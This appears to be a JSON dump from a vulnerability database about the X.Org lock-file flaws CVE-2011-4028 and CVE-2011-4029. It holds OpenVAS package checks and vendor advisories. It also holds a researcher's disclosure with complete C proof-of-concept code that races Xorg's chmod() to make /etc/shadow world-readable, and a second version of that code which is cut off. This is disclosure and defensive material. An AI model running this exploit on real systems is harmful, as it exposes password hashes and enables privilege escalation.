by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850266\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-08-02 23:08:35 +0530 (Thu, 02 Aug 2012)\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"openSUSE-SU\", value:\"2012:0227-1\");\n script_name(\"openSUSE: Security Advisory for xorg-x11-server (openSUSE-SU-2012:0227-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xorg-x11-server'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE11\\.3\");\n\n script_tag(name:\"affected\", value:\"xorg-x11-server on openSUSE 11.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"insight\", value:\"The X server had two security issues and one bug that is\n fixed by this update.\n\n CVE-2011-4028: It is 
possible for a local attacker to\n deduce if a file exists or not by exploiting the way that\n Xorg creates its lock files.\n\n CVE-2011-4029: It is possible for a non-root local user to\n set the read permission for all users on any file or\n directory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-Xvnc\", rpm:\"xorg-x11-Xvnc~7.5_1.8.0~10.15.2\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server\", rpm:\"xorg-x11-server~7.5_1.8.0~10.15.2\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-extra\", rpm:\"xorg-x11-server-extra~7.5_1.8.0~10.15.2\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-sdk\", rpm:\"xorg-x11-server-sdk~7.5_1.8.0~10.15.2\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-19.", "modified": "2018-10-12T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:136141256231070782", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070782", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-19 (xorg-server)", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201110_19.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70782\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:40 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-19 (xorg-server)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities in the X.Org X server might allow local\n attackers to disclose information.\");\n script_tag(name:\"solution\", value:\"All X.Org X Server 1.9 users should upgrade to the latest 1.9 version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-base/xorg-server-1.9.5-r1'\n\n\nAll X.Org X Server 1.10 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-base/xorg-server-1.10.4-r1'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-19\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=387069\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201110-19.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"x11-base/xorg-server\", unaffected: make_list(\"rge 1.9.5-r1\", \"ge 1.10.4-r1\"), vulnerable: make_list(\"lt 1.10.4-r1\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}], "ubuntu": [{"lastseen": "2020-07-09T01:42:12", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2010-4819", "CVE-2011-4029", "CVE-2010-4818"], "description": "USN-1232-1 fixed vulnerabilities in the X.Org X server. 
A regression was \nfound on Ubuntu 10.04 LTS that affected GLX support.\n\nThis update temporarily disables the fix for CVE-2010-4818 that introduced \nthe regression.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nIt was discovered that the X server incorrectly handled certain malformed \ninput. An authorized attacker could exploit this to cause the X server to \ncrash, leading to a denial of service, or possibly execute arbitrary code \nwith root privileges. This issue only affected Ubuntu 10.04 LTS and 10.10. \n(CVE-2010-4818)\n\nIt was discovered that the X server incorrectly handled certain malformed \ninput. An authorized attacker could exploit this to cause the X server to \ncrash, leading to a denial of service, or possibly read arbitrary data from \nthe X server process. This issue only affected Ubuntu 10.04 LTS. \n(CVE-2010-4819)\n\nVladz discovered that the X server incorrectly handled lock files. A local \nattacker could use this flaw to determine if a file existed or not. \n(CVE-2011-4028)\n\nVladz discovered that the X server incorrectly handled setting lock file \npermissions. A local attacker could use this flaw to gain read permissions \non arbitrary files and view sensitive information. (CVE-2011-4029)", "edition": 5, "modified": "2011-10-19T00:00:00", "published": "2011-10-19T00:00:00", "id": "USN-1232-2", "href": "https://ubuntu.com/security/notices/USN-1232-2", "title": "X.Org X server regression", "type": "ubuntu", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T01:31:49", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2010-4819", "CVE-2011-4029", "CVE-2010-4818"], "description": "It was discovered that the X server incorrectly handled certain malformed \ninput. An authorized attacker could exploit this to cause the X server to \ncrash, leading to a denial of service, or possibly execute arbitrary code \nwith root privileges. 
This issue only affected Ubuntu 10.04 LTS and 10.10. \n(CVE-2010-4818)\n\nIt was discovered that the X server incorrectly handled certain malformed \ninput. An authorized attacker could exploit this to cause the X server to \ncrash, leading to a denial of service, or possibly read arbitrary data from \nthe X server process. This issue only affected Ubuntu 10.04 LTS. \n(CVE-2010-4819)\n\nVladz discovered that the X server incorrectly handled lock files. A local \nattacker could use this flaw to determine if a file existed or not. \n(CVE-2011-4028)\n\nVladz discovered that the X server incorrectly handled setting lock file \npermissions. A local attacker could use this flaw to gain read permissions \non arbitrary files and view sensitive information. (CVE-2011-4029)", "edition": 5, "modified": "2011-10-18T00:00:00", "published": "2011-10-18T00:00:00", "id": "USN-1232-1", "href": "https://ubuntu.com/security/notices/USN-1232-1", "title": "X.Org X server vulnerabilities", "type": "ubuntu", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T01:46:39", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2010-4819", "CVE-2011-4029", "CVE-2010-4818"], "description": "USN-1232-1 fixed vulnerabilities in the X.Org X server. A regression was \nfound on Ubuntu 10.04 LTS that affected GLX support, and USN-1232-2 was \nreleased to temporarily disable the problematic security fix. This update \nincludes a revised fix for CVE-2010-4818.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nIt was discovered that the X server incorrectly handled certain malformed \ninput. An authorized attacker could exploit this to cause the X server to \ncrash, leading to a denial of service, or possibly execute arbitrary code \nwith root privileges. This issue only affected Ubuntu 10.04 LTS and 10.10. \n(CVE-2010-4818)\n\nIt was discovered that the X server incorrectly handled certain malformed \ninput. 
An authorized attacker could exploit this to cause the X server to \ncrash, leading to a denial of service, or possibly read arbitrary data from \nthe X server process. This issue only affected Ubuntu 10.04 LTS. \n(CVE-2010-4819)\n\nVladz discovered that the X server incorrectly handled lock files. A local \nattacker could use this flaw to determine if a file existed or not. \n(CVE-2011-4028)\n\nVladz discovered that the X server incorrectly handled setting lock file \npermissions. A local attacker could use this flaw to gain read permissions \non arbitrary files and view sensitive information. (CVE-2011-4029)", "edition": 5, "modified": "2011-10-20T00:00:00", "published": "2011-10-20T00:00:00", "id": "USN-1232-3", "href": "https://ubuntu.com/security/notices/USN-1232-3", "title": "X.Org X server vulnerability", "type": "ubuntu", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-4028", "CVE-2010-4819", "CVE-2011-4029", "CVE-2010-4818"], "description": "==========================================================================\r\nUbuntu Security Notice USN-1232-1\r\nOctober 18, 2011\r\n\r\nxorg-server vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 11.10\r\n- Ubuntu 11.04\r\n- Ubuntu 10.10\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nThe X server could be made to crash, run programs as an administrator, or\r\nread arbitrary files.\r\n\r\nSoftware Description:\r\n- xorg-server: X.Org X server\r\n\r\nDetails:\r\n\r\nIt was discovered that the X server incorrectly handled certain malformed\r\ninput. An authorized attacker could exploit this to cause the X server to\r\ncrash, leading to a denial of service, or possibly execute arbitrary code\r\nwith root privileges. 
This issue only affected Ubuntu 10.04 LTS and 10.10.\r\n(CVE-2010-4818)\r\n\r\nIt was discovered that the X server incorrectly handled certain malformed\r\ninput. An authorized attacker could exploit this to cause the X server to\r\ncrash, leading to a denial of service, or possibly read arbitrary data from\r\nthe X server process. This issue only affected Ubuntu 10.04 LTS.\r\n(CVE-2010-4819)\r\n\r\nVladz discovered that the X server incorrectly handled lock files. A local\r\nattacker could use this flaw to determine if a file existed or not.\r\n(CVE-2011-4028)\r\n\r\nVladz discovered that the X server incorrectly handled setting lock file\r\npermissions. A local attacker could use this flaw to gain read permissions\r\non arbitrary files and view sensitive information. (CVE-2011-4029)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 11.10:\r\n xserver-xorg-core 2:1.10.4-1ubuntu4.1\r\n\r\nUbuntu 11.04:\r\n xserver-xorg-core 2:1.10.1-1ubuntu1.3\r\n\r\nUbuntu 10.10:\r\n xserver-xorg-core 2:1.9.0-0ubuntu7.5\r\n\r\nUbuntu 10.04 LTS:\r\n xserver-xorg-core 2:1.7.6-2ubuntu7.8\r\n\r\nAfter a standard system update you need to restart your session to make\r\nall the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1232-1\r\n CVE-2010-4818, CVE-2010-4819, CVE-2011-4028, CVE-2011-4029\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/xorg-server/2:1.10.4-1ubuntu4.1\r\n https://launchpad.net/ubuntu/+source/xorg-server/2:1.10.1-1ubuntu1.3\r\n https://launchpad.net/ubuntu/+source/xorg-server/2:1.9.0-0ubuntu7.5\r\n https://launchpad.net/ubuntu/+source/xorg-server/2:1.7.6-2ubuntu7.8\r\n", "edition": 1, "modified": "2011-10-20T00:00:00", "published": "2011-10-20T00:00:00", "id": "SECURITYVULNS:DOC:27170", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27170", "title": "[USN-1232-1] X.Org X server vulnerabilities", "type": "securityvulns", 
"cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:44", "bulletinFamily": "software", "cvelist": ["CVE-2011-4028", "CVE-2010-4819", "CVE-2011-4029", "CVE-2010-4818"], "description": "Memory corruptions, insecure lock file creation.", "edition": 1, "modified": "2011-10-20T00:00:00", "published": "2011-10-20T00:00:00", "id": "SECURITYVULNS:VULN:11984", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11984", "title": "X.Org multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:22", "description": "", "published": "2011-10-27T00:00:00", "type": "packetstorm", "title": "Xorg Permission Change", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4029"], "modified": "2011-10-27T00:00:00", "id": "PACKETSTORM:106307", "href": "https://packetstormsecurity.com/files/106307/Xorg-Permission-Change.html", "sourceData": "`Author: vladz <vladz@devzero.fr> (new on twitter @v14dz!) \nDescription: Xorg permission change vulnerability (CVE-2011-4029) \nProduct: X.Org (http://www.x.org/releases/) \nAffected: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and \nearlier if built with the USE_CHMOD preprocessor identifier \n \nPoC tested on: Debian 6.0.2 up to date with X default configuration issued \nfrom the xserver-xorg-core package (version 2:1.7.7-13) \n \nFollow-up: 2011/10/07 - X.org foundation informed \n2011/10/09 - Distros informed \n2011/10/18 - Issue/patch publicly announced \n \n \nIntroduction \n------------ \n \nI've found a file permission change vulnerability in the way that Xorg \ncreates its temporary lock file \"/tmp/.tXn-lock\" (where 'n' is the X \ndisplay). When exploited, this vulnerability allows a non-root user to set \nthe read permission for all users on any file or directory. 
\n \nFor the exploit to succeed the local attacker needs to be able to run the \nX.Org X11 X server. \n \nNOTE: At this time (26/10/2010), some distros are still vulnerable (see \n\"Fix & Patch\" above for more informations). \n \n \nDescription \n----------- \n \nOnce started, Xorg attempts to create a lock file \"/tmp/.Xn-lock\" in a \nsecure manner: it creates/opens a temporary lock file \"/tmp/.tXn-lock\" \nwith the O_EXCL flag, writes the current PID into it, links it to the final \n\"/tmp/.Xn-lock\" and unlink \"/tmp/.tXn-lock\". Here is the code: \n \n$ cat -n os/utils.c \n[...] \n288 /* \n289 * Create a temporary file containing our PID. Attempt three times \n290 * to create the file. \n291 */ \n292 StillLocking = TRUE; \n293 i = 0; \n294 do { \n295 i++; \n296 lfd = open(tmp, O_CREAT | O_EXCL | O_WRONLY, 0644); \n297 if (lfd < 0) \n298 sleep(2); \n299 else \n300 break; \n301 } while (i < 3); \n302 if (lfd < 0) { \n303 unlink(tmp); \n304 i = 0; \n305 do { \n306 i++; \n307 lfd = open(tmp, O_CREAT | O_EXCL | O_WRONLY, 0644); \n308 if (lfd < 0) \n309 sleep(2); \n310 else \n311 break; \n312 } while (i < 3); \n313 } \n314 if (lfd < 0) \n315 FatalError(\"Could not create lock file in %s\\n\", tmp); \n316 (void) sprintf(pid_str, \"%10ld\\n\", (long)getpid()); \n317 (void) write(lfd, pid_str, 11); \n318 (void) chmod(tmp, 0444); \n319 (void) close(lfd); \n320 \n[...] \n328 haslock = (link(tmp,LockFile) == 0); \n329 if (haslock) { \n330 /* \n331 * We're done. \n332 */ \n333 break; \n334 } \n335 else { \n336 /* \n337 * Read the pid from the existing file \n338 */ \n339 lfd = open(LockFile, O_RDONLY); \n340 if (lfd < 0) { \n341 unlink(tmp); \n342 FatalError(\"Can't read lock file %s\\n\", LockFile); \n343 } \n[...] \n \nAs a reminder, chmod() operates on filenames rather than on file handles. \nSo in this case, at line 318, there is no guarantee that the file \n\"/tmp/.tXn-lock\" still refers to the same file on disk that it did when it \nwas opened via the open() call. 
See TOCTOU vulnerability explained on \nOWASP[1] for more informations. \n \nThe idea here is to remove and replace (by a malicious symbolic link), the \n\"tmp\" file (\"/tmp/.tXn-lock\") between the call to open() at line 296 and \nthe call to chmod() at line 318. But for a non-root user, removing this \nfile looks impossible as it is located in a sticky bit directory (\"/tmp\") \nand owned by root. \n \nBut, what if we launch two Xorg processes with an initial offset (few \nmilliseconds) so that the first process unlink() (line 341) the \"tmp\" file \nright before the second process calls chmod()? This race condition would \nconsists in placing unlink() between open() and chmod(). It sounds very \ndifficult because there is only one system call between them (and maybe not \nenough time to perform unlink() and create our symbolic link): \n \n# strace X :1 \n[...] \nopen(\"/tmp/.tX1-lock\", O_WRONLY|O_CREAT|O_EXCL, 0644) = 0 \nwrite(0, \" 2192\\n\", 11) = 11 \nchmod(\"/tmp/.tX1-lock\", 0444) = 0 \n \nAnyway, we can make this possible by sending signals SIGCONT and SIGSTOP[2] \nto our process. As they are not trapped by the program, they will allow us \nto control and regulate (by stopping and resuming) the execution flow. \n \nHere is how to proceed: \n \n1) launch the X wrapper (pid=n) \n2) stop it (by sending SIGSTOP to 'n') rigth after \"/tmp/.tX1-lock\" is \ncreated (this actually means that the next instruction is chmod()) \n3) launch another X process to unlink() /tmp/.tX1-lock \n4) create the symbolic link \"/tmp/.tX1-lock\" -> \"/etc/shadow\" \n5) send SIGCONT to 'n' to perform chmod() on our link \n \nThe minor problem is that when launching X several times (for race \npurpose), it makes the console switch between X and TTY, and in some cases, \nit freezes the screen and disturbs the attack. The solution is to make X \nexit before it switches by creating a link \"/tmp/.Xn-lock\" (real lock \nfilename) to a file that doesn't exist. 
This will make the open() call \nfails at line 339, and quit with FatalError() at 342. \n \nSo before our 5 steps, we just need to add: \n \n0) create the symbolic link \"/tmp/.X1-lock\" -> \"/dontexist\" \n \n \nProof Of Concept \n---------------- \n \n/* xchmod.c -- Xorg file permission change vulnerability PoC \n \nThis PoC sets the rights 444 (read for all) on any file specified as \nargument (default file is \"/etc/shadow\"). Another good use for an \nattacker would be to dump an entire partition in order to disclose its \nfull content later (via a \"mount -o loop\"). Made for EDUCATIONAL \nPURPOSES ONLY! CVE-2011-4029 has been assigned. \n \nIn some configurations, this exploit must be launched from a TTY \n(switch by typing Ctrl-Alt-Fn). \n \nTested on Debian 6.0.2 up to date with X default configuration issued \nfrom the xserver-xorg-core package (version 2:1.7.7-13). \n \nCompile: cc xchmod.c -o xchmod \nUsage: ./xchmod [/path/to/file] (default file is /etc/shadow) \n \n$ ls -l /etc/shadow \n-rw-r----- 1 root shadow 1072 Aug 7 07:10 /etc/shadow \n$ ./xchmod \n[+] Trying to stop a Xorg process right before chmod() \n[+] Process ID 4134 stopped (SIGSTOP sent) \n[+] Removing /tmp/.tX1-lock by launching another Xorg process \n[+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow) \n[+] Process ID 4134 resumed (SIGCONT sent) \n[+] Attack succeeded, ls -l /etc/shadow: \n-r--r--r-- 1 root shadow 1072 Aug 7 07:10 /etc/shadow \n \n----------------------------------------------------------------------- \n \n\"THE BEER-WARE LICENSE\" (Revision 42): \n<vladz@devzero.fr> wrote this file. As long as you retain this notice \nyou can do whatever you want with this stuff. If we meet some day, and \nyou think this stuff is worth it, you can buy me a beer in return. -V. 
\n*/ \n#include <sys/types.h> \n#include <sys/stat.h> \n#include <fcntl.h> \n#include <unistd.h> \n#include <stdio.h> \n#include <syscall.h> \n#include <signal.h> \n#include <string.h> \n#include <stdlib.h> \n \n \n#define XORG_BIN \"/usr/bin/X\" \n#define DISPLAY \":1\" \n \n \nchar *get_tty_number(void) { \nchar tty_name[128], *ptr; \n \nmemset(tty_name, '\\0', sizeof(tty_name)); \nreadlink(\"/proc/self/fd/0\", tty_name, sizeof(tty_name)); \n \nif ((ptr = strstr(tty_name, \"tty\"))) \nreturn ptr + 3; \n \nreturn NULL; \n} \n \nint launch_xorg_instance(void) { \nint child_pid; \nchar *opt[] = { XORG_BIN, DISPLAY, NULL }; \n \nif ((child_pid = fork()) == 0) { \nclose(1); close(2); \nexecve(XORG_BIN, opt, NULL); \n_exit(0); \n} \n \nreturn child_pid; \n} \n \nvoid show_target_file(char *file) { \nchar cmd[128]; \n \nmemset(cmd, '\\0', sizeof(cmd)); \nsprintf(cmd, \"/bin/ls -l %s\", file); \nsystem(cmd); \n} \n \nint main(int argc, char **argv) { \npid_t proc; \nstruct stat st; \nint n, ret, current_attempt = 800; \nchar target_file[128], lockfiletmp[20], lockfile[20], *ttyno; \n \nif (argc < 2) \nstrcpy(target_file, \"/etc/shadow\"); \nelse \nstrcpy(target_file, argv[1]); \n \nsprintf(lockfile, \"/tmp/.X%s-lock\", DISPLAY+1); \nsprintf(lockfiletmp, \"/tmp/.tX%s-lock\", DISPLAY+1); \n \n/* we must ensure that Xorg is not already running on this display */ \nif (stat(lockfile, &st) == 0) { \nprintf(\"[-] %s exists, maybe Xorg is already running on this\" \n\" display? Choose another display by editing the DISPLAY\" \n\" attributes.\\n\", lockfile); \nreturn 1; \n} \n \n/* this avoid execution to continue (and automatically switch to another \n* TTY). Xorg quits with fatal error because the file that /tmp/.X?-lock \n* links does not exist. 
\n*/ \nsymlink(\"/dontexist\", lockfile); \n \n/* we have to force this mask to not comprise our later checks */ \numask(077); \n \nttyno = get_tty_number(); \n \nprintf(\"[+] Trying to stop a Xorg process right before chmod()\\n\"); \nwhile (--current_attempt) { \nproc = launch_xorg_instance(); \n \nn = 0; \nwhile (n++ < 10000) \nif ((ret = syscall(SYS_stat, lockfiletmp, &st)) == 0) \nbreak; \n \nif (ret == 0) { \nsyscall(SYS_kill, proc, SIGSTOP); \nprintf(\"[+] Process ID %d stopped (SIGSTOP sent)\\n\", proc); \n \nstat(lockfiletmp, &st); \nif ((st.st_mode & 4) == 0) \nbreak; \n \nprintf(\"[-] %s file has wrong rights (%o)\\n\" \n\"[+] removing it by launching another Xorg process\\n\", \nlockfiletmp, st.st_mode); \nlaunch_xorg_instance(); \nsleep(7); \n} \n \nkill(proc, SIGKILL); \n} \n \nif (current_attempt == 0) { \nprintf(\"[-] Attack failed.\\n\"); \n \nif (!ttyno) \nprintf(\"Try with console ownership: switch to a TTY* by using \" \n\"Ctrl-Alt-F[1-6] and try again.\\n\"); \n \nreturn 1; \n} \n \nprintf(\"[+] Removing %s by launching another Xorg process\\n\", \nlockfiletmp); \nlaunch_xorg_instance(); \nsleep(7); \n \nif (stat(lockfiletmp, &st) == 0) { \nprintf(\"[-] %s lock file still here... :(\\n\", lockfiletmp); \nreturn 1; \n} \n \nprintf(\"[+] Creating evil symlink (%s -> %s)\\n\", lockfiletmp, \ntarget_file); \nsymlink(target_file, lockfiletmp); \n \nprintf(\"[+] Process ID %d resumed (SIGCONT sent)\\n\", proc); \nkill(proc, SIGCONT); \n \n/* wait for chmod() to finish */ \nusleep(300000); \n \nstat(target_file, &st); \nif (!(st.st_mode & 004)) { \nprintf(\"[-] Attack failed, rights are %o. Try again!\\n\", st.st_mode); \nreturn 1; \n} \n \n/* cleaning temporary link */ \nunlink(lockfile); \n \nprintf(\"[+] Attack succeeded, ls -l %s:\\n\", target_file); \nshow_target_file(target_file); \n \nreturn 0; \n} \n \n \nFix & Patch \n------------ \n \nA fix for this vulnerability is available and will be included in xserver \n1.11.2 and xserver 1.12. 
\n \nhttp://cgit.freedesktop.org/xorg/xserver/commit/?id=b67581cf825940fdf52bf2e0af4330e695d724a4 \n \nSome distros released new Xorg packages (Ubuntu, Gentoo) since others (like \nDebian) judge this as a non-critical issue: \n \nhttp://security-tracker.debian.org/tracker/CVE-2011-4029 \n \n \nFootnotes & links \n----------------- \n \n[1] https://www.owasp.org/index.php/File_Access_Race_Condition:_TOCTOU \n \n[2] http://en.wikipedia.org/wiki/SIGCONT \n\"SIGCONT is the signal sent to restart a process previously paused by \nthe SIGSTOP signal\". \n \n \n`\n", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/106307/xorg-poc.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:05:27", "description": "\nX.Org xorg 1.4 1.11.2 - File Permission Change", "edition": 1, "published": "2011-10-28T00:00:00", "title": "X.Org xorg 1.4 1.11.2 - File Permission Change", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4029", "CVE-2011-4613"], "modified": "2011-10-28T00:00:00", "id": "EXPLOITPACK:BB0D1D84B91708D4480C30F833A625B6", "href": "", "sourceData": "/* xchmod.c -- Xorg file permission change vulnerability PoC\n\n Author: vladz (http://vladz.devzero.fr)\n Date: 2011/12/15\n Software: www.x.org\n Version: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and\n earlier if built with the USE_CHMOD preprocessor identifier\n Tested on: Debian 6.0.2 up to date with X default configuration issued\n from the xserver-xorg-core package (version 2:1.7.7-13)\n CVEs: CVE-2011-4029 & CVE-2011-4613\n\n This PoC exploits CVE-2011-4029 to set the rights 444 (read for all) on\n arbitrary file specified as argument (default file is \"/etc/shadow\").\n It uses SIGSTOP/SIGCONT signals and the Inotify API to win the race.\n Made for EDUCATIONAL PURPOSES ONLY!\n\n On some configurations, this exploit must be launched from a TTY (switch\n by typing Ctrl-Alt-Fn). 
But not on Debian, because it bypasses the X\n wrapper permission thanks to CVE-2011-4613!\n\n Tested on Debian 6.0.3 up to date with X default configuration issued\n from the xserver-xorg-core package (version 2:1.7.7-13).\n\n Compile: cc xchmod.c -o xchmod\n Usage: ./xchmod [/path/to/file] (default file is /etc/shadow)\n\n $ ls -l /etc/shadow\n -rw-r----- 1 root shadow 1072 Aug 7 07:10 /etc/shadow\n $ ./xchmod\n [+] Trying to stop a Xorg process right before chmod()\n [+] Process ID 4134 stopped (SIGSTOP sent)\n [+] Removing /tmp/.tX1-lock by launching another Xorg process\n [+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)\n [+] Process ID 4134 resumed (SIGCONT sent)\n [+] Attack succeeded, ls -l /etc/shadow:\n -r--r--r-- 1 root shadow 1072 Aug 7 07:10 /etc/shadow\n\n -----------------------------------------------------------------------\n\n \"THE BEER-WARE LICENSE\" (Revision 42):\n <vladz@devzero.fr> wrote this file. As long as you retain this notice\n you can do whatever you want with this stuff. If we meet some day, and\n you think this stuff is worth it, you can buy me a beer in return. -V.\n*/\n\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdio.h>\n#include <syscall.h>\n#include <signal.h>\n#include <string.h>\n#include <stdlib.h>\n#include <sys/stat.h>\n#include <sys/inotify.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n\n#define XORG_BIN \"/usr/bin/X\"\n#define DISPLAY \":1\"\n\n\nchar *get_tty_number(void) {\n char tty_name[128], *ptr;\n\n memset(tty_name, '\\0', sizeof(tty_name));\n readlink(\"/proc/self/fd/0\", tty_name, sizeof(tty_name));\n\n if ((ptr = strstr(tty_name, \"tty\")))\n return ptr + 3;\n\n return NULL;\n}\n\n\nvoid timeout_handler() {\n\n printf(\"[-] read() timeout! 
